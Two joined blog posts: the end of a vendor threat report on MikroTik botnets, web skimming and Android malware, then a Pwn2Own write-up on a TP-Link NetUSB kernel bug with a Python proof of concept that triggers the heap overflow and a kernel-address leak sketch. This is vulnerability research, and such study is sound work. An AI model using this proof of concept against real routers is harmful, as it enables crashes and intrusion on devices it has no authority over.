A few days before we published our research in March, a new story emerged describing a DDoS campaign most likely tied to the Sodinokibi ransomware group. Unsurprisingly, most of the attacking devices were MikroTik again. A few days ago, we were contacted by security researchers from SecurityScorecard. They have observed another DDoS botnet, called Zhadnost, targeting Ukrainian institutions and again using MikroTik devices as an amplification vector. This time, they were mainly misusing DNS amplification vulnerabilities.

We also saw one compelling instance of a network security incident potentially involving MikroTik routers. In the infamous cyberattack on February 24th against the Viasat KA-SAT service, attackers penetrated the management segment of the network and wiped firmware from client terminal devices.

The incident surfaced more prominently after the cyberattack paralyzed 11 gigawatts of German wind turbine production as a probable spill-over from the KA-SAT issue. The connectivity for turbines is provided by EuroSkyPark, one of the satellite internet providers using the KA-SAT network.

When we analyzed ASN AS208484, an autonomous system assigned to EuroSkyPark, we found 15 MikroTik devices with exposed TCP port 8728, which is used for API access to administer the devices. Also of concern, one of the devices had the infamously vulnerable WinBox protocol port exposed to the Internet. As of now, all mentioned ports are closed and no longer accessible.

We also found SSH access remapped to non-standard ports such as 9992 or 9993. This is not common practice and may indicate compromise; attackers have been known to remap the ports of standard services (such as SSH) to make them harder to detect, or even harder for the device owner to manage. However, it could also have been configured deliberately by the administrators for the same reason: to hide SSH access from plain sight.
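
For readers who want to run a similar sanity check against their own equipment, here is a minimal Python sketch of the kind of port probing involved. It only checks the ports discussed above; the WinBox port number (8291) and the example address are assumptions for illustration and are not taken from our scan data.

import socket

# Ports of interest on MikroTik devices: 8728 is the RouterOS API port
# mentioned above; 8291 is the usual WinBox port (assumed here, the report
# does not spell out the number); 9992/9993 are the non-standard ports the
# SSH service had been remapped to.
PORTS = {
    8728: 'RouterOS API',
    8291: 'WinBox (assumed port number)',
    9992: 'possibly remapped SSH',
    9993: 'possibly remapped SSH',
}

def check_host(host, timeout=2.0):
    open_ports = []
    for port, label in PORTS.items():
        try:
            # a successful TCP connect is enough to flag the port as exposed
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append((port, label))
        except OSError:
            pass
    return open_ports

if __name__ == '__main__':
    # Only probe devices you own or are explicitly authorized to assess.
    for port, label in check_host('192.0.2.1'):
        print(f'open: {port} ({label})')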

CVE-2018-14847 vulnerable devices in percent by country

From all the above, it’s apparent that we can expect to see similar patterns and DDoS attacks carried out not only by MikroTik devices but also by other vulnerable IoT devices in the foreseeable future. On a positive note, the number of MikroTik devices vulnerable to the most commonly misused CVEs is slowly decreasing as new versions of RouterOS (the OS that powers MikroTik appliances) are rolled out. Unfortunately, however, many devices are already compromised, and without administrative intervention, they will continue to be used for malicious operations.

We strongly recommend that MikroTik administrators ensure they have updated and patched to protect themselves and others.  


If you are a researcher and you think you have seen MikroTik devices involved in some malicious activity, please consider contacting us if you need help or consultation; since 2018, we have built up a detailed understanding of these devices’ threat landscape.

RouterOS major version 7 and above adoption

Martin Hron, Malware Researcher

Web skimming

In Q1/22, the most prevalent web skimming malicious domain was naturalfreshmall[.]com, with more than 500 e-commerce sites infected. The domain itself is no longer active, but many websites are still trying to retrieve malicious content from it. Unfortunately, this means that the administrators of these sites still have not removed the malicious code, and these sites are likely still vulnerable. Avast protected 44k users from this attack in the first quarter.

The heatmap below shows the most affected countries in Q1/22 – Saudi Arabia, Australia, Greece, and Brazil. Compared to Q4/21, Saudi Arabia, Australia, and Greece stayed at the top, but in Brazil we protected almost twice as many users as in the previous quarter. Multiple websites were infected in Brazil, some with the aforementioned domain naturalfreshmall[.]com. In addition, we tweeted about philco.com[.]br, which was infected with yoursafepayments[.]com/fonts.css. And last but not least, pernambucanas.com[.]br was also infected, with malicious JavaScript hidden in the file require.js on their website.

Overall the number of protected users remains almost the same as in Q4/21.

Pavlína Kopecká, Malware Analyst

Mobile-Related Threats

Adware/HiddenAds

Adware maintains its dominance over the Android threat landscape, continuing the trend from previous years. Generally, the purpose of Adware is to display out-of-context advertisements to the device user, often in ways that severely impact the user experience. In Q1/22, HiddenAds, FakeAdblockers, and others have spread to many Android devices; these applications often display device-wide advertisements that overlay the user’s intended activity or limit the app’s functionality by displaying timed ads without the ability to skip them.

Adware comes in various configurations; one popular category relies on stealthy installation. Such apps share common features that make them difficult for the user to identify. Hiding the application’s icon from the home screen is a common technique, as is using blank application icons to mask their presence. The user may struggle to identify the source of the intrusive advertisements, especially if the applications have an in-built delay timer after which they display the ads. Another Adware tactic is to use in-app advertisements that are overly aggressive, sometimes to the extent that they make the original app’s intended functionality barely usable. This is common especially in games, where timed ads are often shown after each completed level; frequently, the ad screen time greatly exceeds the time spent playing the game.

The Google Play Store has previously been used to distribute malware, but recently, actors behind these applications have changed tactics to use browser pop-up windows and notifications to spread the Adware. These are intended to trick users into downloading and installing the application, often disguised as games, ad blockers, or various utility tools. Therefore, we strongly recommend that users avoid installing applications from unknown sources and be on the lookout for malicious browser notifications.

According to our data, India, the Middle East, and South America are the most affected regions. But Adware is not strictly limited to these regions; it’s prevalent worldwide.

As can be seen from the graph below, Adware’s presence in the mobile sphere has remained dominant but relatively unchanged. Of course, there’s slight fluctuation during each quarter, but there have been no stand-out new strains of Adware as of late.

Bankers

In Q1/2022, some interesting shifts were observed in the banking malware category. With Cerberus/Alien and its clones still leading the scoreboard by far, the battle for second place saw a shake-up, with Hydra replacing the previously significant threat posed by FluBot. Additionally, FluBot has been on the decline throughout Q1.

Different banker strains have been reported to use the same distribution channels and branding, which we can confirm from our own observations. Many banking threats now reuse the proven techniques of masquerading as delivery services, parcel tracking apps, or voicemail apps.

After the departure of FluBot from the scene, we observed an overall slight drop in the number of affected users, but this seems to be simply a return to the numbers we observed last year, just before FluBot took the stage.

The most targeted countries remain Turkey, Spain, and Australia.

PremiumSMS/Subscription scams

While PremiumSMS/subscription-related threats may not be as prevalent as in previous years, they are certainly not gone for good. As reported in the Q4/21 report, new waves of premium subscription-related scams keep popping up. Campaigns such as GriftHorse and UltimaSMS made their rounds last year, followed by yet another similar campaign dubbed DarkHerring.

The main distribution channel for these seems to be Google Play, but they have also been observed being downloaded from alternative channels. Similar to before, this scam preys on the mobile operator’s subscription scheme, where an unsuspecting user is lured into giving out their phone number. The number is later used to register the victim for a premium subscription service. This can go undetected for a long time, causing the victim significant monetary loss due to the stealthiness of the subscription and the hassle of canceling it.

While the primary target of these campaigns seems to remain the same as in Q4/21 – the Middle East, with countries like Iraq, Jordan, Saudi Arabia, and Egypt – the scope has broadened and now includes various Asian countries as well, with China, Malaysia, and Vietnam amongst the riskiest.

As can be seen from the quarterly comparisons in the graph below, the spikes of activity of the respective campaigns are clear, with UltimaSMS and GriftHorse causing the spike in Q4/21. DarkHerring is behind the Q1/22 spike.

Ransomware/Lockers

Ransomware apps and Lockers that target the Android ecosystem often attempt to ‘lock’ the user’s phone by disabling the navigation buttons and taking over the Android lock screen to prevent the user from interacting with the device and removing the malware. This is commonly accompanied by a ransom message requesting payment to the malware owner in exchange for unlocking the device.

Among the most prevalent Android Lockers seen in Q1/22 were Jisut, Pornlocker, and Congur. These are notorious for being difficult to remove and, in some cases, may require a factory reset of the phone. Some versions of lockers may even attempt to encrypt the user’s files; however, this is not frequently seen due to the complexity of encrypting files on Android devices.

The threat actors responsible for this malware generally rely on spreading through the use of third-party app stores, game cheats, and adult content applications.

A common infection technique is to lure users through popular internet themes and topics – we strongly recommend that users avoid attempting to download game hacks and mods and ensure that they use reputable websites and official app stores.

In Q1/22, we’ve seen spikes in this category, mainly related to the Pornlocker family – apps masquerading as adult content providers – which predominantly targeted users in Russia.

In the graph above, we can see the spike caused by the Pornlocker family in Q1/22.

Ondřej David, Malware Analysis Team Lead
Jakub Vávra, Malware Analyst

Acknowledgements / Credits

Malware researchers
  • Adolf Středa
  • Alexej Savčin
  • Anh Ho
  • David Álvarez
  • Igor Morgenstern
  • Jakub Křoustek
  • Jakub Vávra
  • Jan Holman
  • Jan Rubín
  • Ladislav Zezula
  • Luigino Camastra
  • Martin Chlumecký
  • Martin Hron
  • Ondřej David
  • Pavel Novák
  • Pavlína Kopecká
  • Samuel Sidor
  • Vladimir Martyanov
  • Vladimír Žalud
Data analysts
  • Pavol Plaskoň
Communications
  • Dave Matthews
  • Stefanie Smith

The post Avast Q1/2022 Threat Report appeared first on Avast Threat Labs.

Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate in the contest, and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, and the hardware was easy and cheap to get, so it felt like the right choice.

router targets

At least, that's what we thought was the path of least resistance. After attending the contest, it seems printers were at least as soft a target, and with a higher payout. But whatever, we weren't in it for the money, so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out which attack surfaces are interesting to look at.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two lines of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low hanging fruits and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended ordering an FT232 USB cable, and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:
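
If you want to script the serial console rather than use it interactively, a minimal sketch is shown below. The post mentions Python and minicom; this sketch assumes pyserial instead (which also ships an interactive terminal via python -m serial.tools.miniterm), and the device path and baud rate are assumptions for a typical FT232 setup.

# Minimal UART interaction sketch (assumes pyserial, /dev/ttyUSB0 and a
# 115200 baud console; adjust for your own wiring).
import serial

with serial.Serial('/dev/ttyUSB0', 115200, timeout=1) as uart:
    uart.write(b'\n')                  # wake up the console
    uart.write(b'cat /proc/version\n') # run a quick command as root
    print(uart.read(4096).decode(errors='replace'))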

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

Enumerating the attack surfaces

It was time for me to figure out which areas I should try to focus my time on. I did a bunch of reading, as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new ground, to lower the chance of entering the competition with a duplicate and also to maximize my chances of finding something that would allow me to enter the competition. Before thinking about duplicates, though, I needed a bug.

I started to do some very basic attack surface enumeration: running processes, iptables rules, listening sockets, crontab, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq

At first sight, the following processes looked interesting:

  • the uhttpd HTTP server,
  • the third-party dnsmasq service, which could potentially be missing patches for upstream bugs (unlikely?),
  • the tdpServer, which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.

Another thing I burned time on was going through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out if dnsmasq was properly patched against recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed otherwise 😔. Dead-end.

NetUSB shenanigans

There were two strange lines in the netstat output from above that stood out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -

Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild thing is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities had been discovered and exploited in it in the past, and that TP-Link was indeed not the only vendor to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while, things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper into the code. After enumerating a lot of places where the attacker input is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
  if(result) {
    v64[0] = _bswapw(v64[0]); <----------------------- attacker controlled
    Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0); <---- overflow
    if(Payload_1) {
      // ...
      if(SoftwareBus_fillBuf(SbusConnection, Payload_1 + 2, v64[0]))

I first thought this was going to lead to a wild overflow type of bug, because the code would try to read a very large number of bytes into this buffer, but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefully, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
  if(SbusConnection)
    if(Buffer) {
      if(BufferLen) {
        while (1) {
          GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
          if ( GetLen <= 0 )
            break;
          BufferLen -= GetLen;
          Buffer = (char *)Buffer + GetLen;
          if ( !BufferLen )
            return 1;
        }
        kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
        return 0;
      }
      else {
        return 1;
      }
    } else {
      // ...
      return 0;
    }
  }
  else {
    // ...
    return 0;
  }
}

KTCP_get is basically a wrapper around ks_recv, which means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data as I wanted. If you are interested in learning how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py, or you can also read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
  # Version
  s.send(b'\x56\x04')
  # Send random data
  s.send(aes_ctx.encrypt(b'a' * 16))
  _ = s.recv(16)
  # Receive & send back the random numbers.
  challenge = s.recv(16)
  s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
  length = len(name)
  assert length - 1 < 63
  s.send(le32(length))
  b = name
  if type(name) == str:
    b = bytes(name, 'ascii')
  s.send(b)

def create_connection(target, port, name):
  second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target, port))
  aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
  send_handshake(s, aes_ctx)
  send_bus_name(s, name)
  return s, aes_ctx

def main():
  parser = argparse.ArgumentParser('Zenith PoC2')
  parser.add_argument('--target', required = True)
  args = parser.parse_args()
  s, _ = create_connection(args.target, netusb_port, 'PoC2')
  s.send(le8(0xff))
  s.send(le8(0x21))
  s.send(le32(0xff_ff_ff_ff))
  p = b'\xab' * (0x1_000 * 100)
  s.send(p)

Another interesting detail was that the allocation function is mallocPageBuf, which I didn't know about. Looking into its implementation, it eventually calls into __get_free_pages, which is part of the Linux kernel. __get_free_pages allocates 2**n pages and is implemented using what is called a Binary Buddy Allocator. I wasn't familiar with that kind of allocator, and ended up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding, the bug would give me full control over the content, and I was able to overflow the pages with pretty much as much data as I wanted. The one thing I couldn't fully control was the size passed to the allocation: because of the integer overflow, I could only trigger a mallocPageBuf call with a size in the interval [0, 8]. mallocPageBuf aligns the passed size to the next power of two and calculates the order (n in 2**n) to invoke __get_free_pages.
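
To make the arithmetic concrete, here is a quick back-of-the-envelope model of the overflow in Python. It is not code from the driver; the rounding logic simply mirrors the "align to the next power of two, then derive the order" behavior described above, under the assumption of 0x1000-byte pages and 32-bit size arithmetic.

PAGE_SIZE = 0x1000

def malloc_page_buf_order(size):
    # round up to at least one page, then to a power-of-two number of pages
    pages = max(1, -(-size // PAGE_SIZE))   # ceiling division
    return (pages - 1).bit_length()         # order n, i.e. 2**n pages

attacker_len = 0xFFFFFFFF                   # size field sent over the network
alloc_size = (attacker_len + 9) & 0xFFFFFFFF
print(hex(alloc_size))                      # 0x8 -> tiny allocation
print(malloc_page_buf_order(alloc_size))    # order 0 -> a single 4KB page
# ...while SoftwareBus_fillBuf is then asked to copy up to 0xFFFFFFFF bytes
# into that page, stopping only when the TCP stream stops delivering data.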

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but would instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
  // ...
  v1 = vsprintf(v6, a1);
  v2 = v1 < 257;
  v3 = v1 + 1;
  if(!v2) {
    v6[256] = 0;
    v3 = 257;
  }
  v5 = v3;
  kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
  return printk("<1>%s", v6);
}

Pretty funny right?
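
Since the diagnostics are pushed out over a TCP socket, grabbing them is just a matter of connecting and reading. Below is a minimal sketch of such a "leaker" client; the port number (33344, the other kernel-owned socket in the netstat output), the 4-byte length prefix implied by kc_dbgD_send(&v5, v3 + 4), and the byte order of that length are all assumptions derived from the reversed code rather than documented protocol facts.

import re
import socket
import struct

def read_exact(s, n):
    # keep reading until exactly n bytes have arrived
    buf = b''
    while len(buf) < n:
        chunk = s.recv(n - len(buf))
        if not chunk:
            raise EOFError('debug service closed the connection')
        buf += chunk
    return buf

def leak_debug_strings(target, port=33344):
    with socket.create_connection((target, port)) as s:
        while True:
            # assumed wire format: 4-byte length, then the message itself;
            # flip '<I' to '>I' if the endianness guess turns out wrong
            length, = struct.unpack('<I', read_exact(s, 4))
            msg = read_exact(s, length).decode(errors='replace')
            pointers = re.findall(r'[0-9a-f]{8}', msg)  # 32-bit kernel addresses
            print(msg.rstrip(), pointers)

if __name__ == '__main__':
    leak_debug_strings('192.168.1.1')  # the router LAN address is an assumption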

Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob, so this lack of introspection wasn't going to work. What were my options?

Well, as I mentioned earlier, TP-Link maintains a GPL archive which has information on the Linux version they use, the patches they apply, and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement over my current situation. I would be able to hook up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering, but it was in fact not. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both kernel configurations until I ended up with a bootable image with a configuration as close as possible to the kernel running on the device. Same kernel version, same allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob, I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device structure defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any type used by this structure can do the same, which means that looking at the main definition of a structure is not enough.

struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
  /* List of functions to handle Wireless Extensions (instead of ioctl).
   * See <net/iw_handler.h> for details. Jean II */
  const struct iw_handler_def * wireless_handlers;
  /* Instance data managed by the core of Wireless Extensions. */
  struct iw_public_data * wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
  struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
  struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
  struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
  struct netdev_rx_queue  *_rx;

  /* Number of RX queues allocated at register_netdev() time */
  unsigned int    num_rx_queues;

  /* Number of RX queues currently active in device */
  unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
  /* CPU reverse-mapping for RX completion interrupts, indexed
   * by RX queue number.  Assigned by driver.  This must only be
   * set if the ndo_rx_flow_steer operation is defined. */
  struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
//...
};

Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash, and try to look at the code / structures involved to see if a kernel configuration option would impact the layout of a relevant structure. From there, I could diff the kernel configuration of my bootable QEMU image against the kernel I had built from the GPL and see where the mismatches were. If there was one, I could simply turn the option on or off, recompile, and hope that it didn't make the kernel unbootable under QEMU.
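
To give an idea of what that comparison looked like in practice, here is a minimal sketch that diffs two kernel .config files and prints the options that differ (the file names are hypothetical; the kernel tree also ships scripts/diffconfig, which does this job properly):

# Toy .config differ: spot options that might change structure layouts.
def load_config(path):
    opts = {}
    with open(path) as f:
        for line in f:
            line = line.strip()
            if line.startswith('CONFIG_') and '=' in line:
                key, value = line.split('=', 1)
                opts[key] = value
            elif line.startswith('# CONFIG_') and line.endswith(' is not set'):
                opts[line.split()[1]] = 'n'
    return opts

qemu = load_config('config-qemu')   # hypothetical file names
gpl = load_config('config-gpl')
for key in sorted(set(qemu) | set(gpl)):
    a, b = qemu.get(key, 'missing'), gpl.get(key, 'missing')
    if a != b:
        print(f'{key}: qemu={a} gpl={b}')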

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

over@panther:~/pwn2own$ qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337
[...]
root@debian-mips:~# ./start.sh
[   89.092000] new slab @ 86964000
[   89.108000] kcg 333 :GPL NetUSB up!
[   89.240000] NetUSB: module license 'Proprietary' taints kernel.
[   89.240000] Disabling lock debugging due to kernel taint
[   89.268000] kc   90 : run_telnetDBGDServer start
[   89.272000] kc  227 : init_DebugD end
[   89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00
[   89.272000] INFO17FA: 7437: Archer C7    :Archer C7
[   89.272000] INFO17FB:  AUTH ISOC
[   89.272000] INFO17FC:  filterAudio
[   89.272000] usbcore: registered new interface driver KC NetUSB General Driver
[   89.276000] INFO0145:  init proc : PAGE_SIZE 4096
[   89.280000] INFO16EC:  infomap 869c6e38
[   89.280000] INFO16EF:  sleep to wait eth0 to wake up
[   89.280000] INFO15BF: tcpConnector() started... : eth0
NetUSB 160207 0 - Live 0x869c0000 (P)
GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000
root@debian-mips:~# [   92.308000] INFO1572: Bind to eth0

For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones):

  • I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM, chroot into those folders, and SHOULD be able to reproduce what I described. Or at least, be very close to reproducing it.
  • I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz, which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz.
  • You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.

Enters Zenith

Once I was able to attach GDB to the kernel, I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had made to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later, if I even got there.

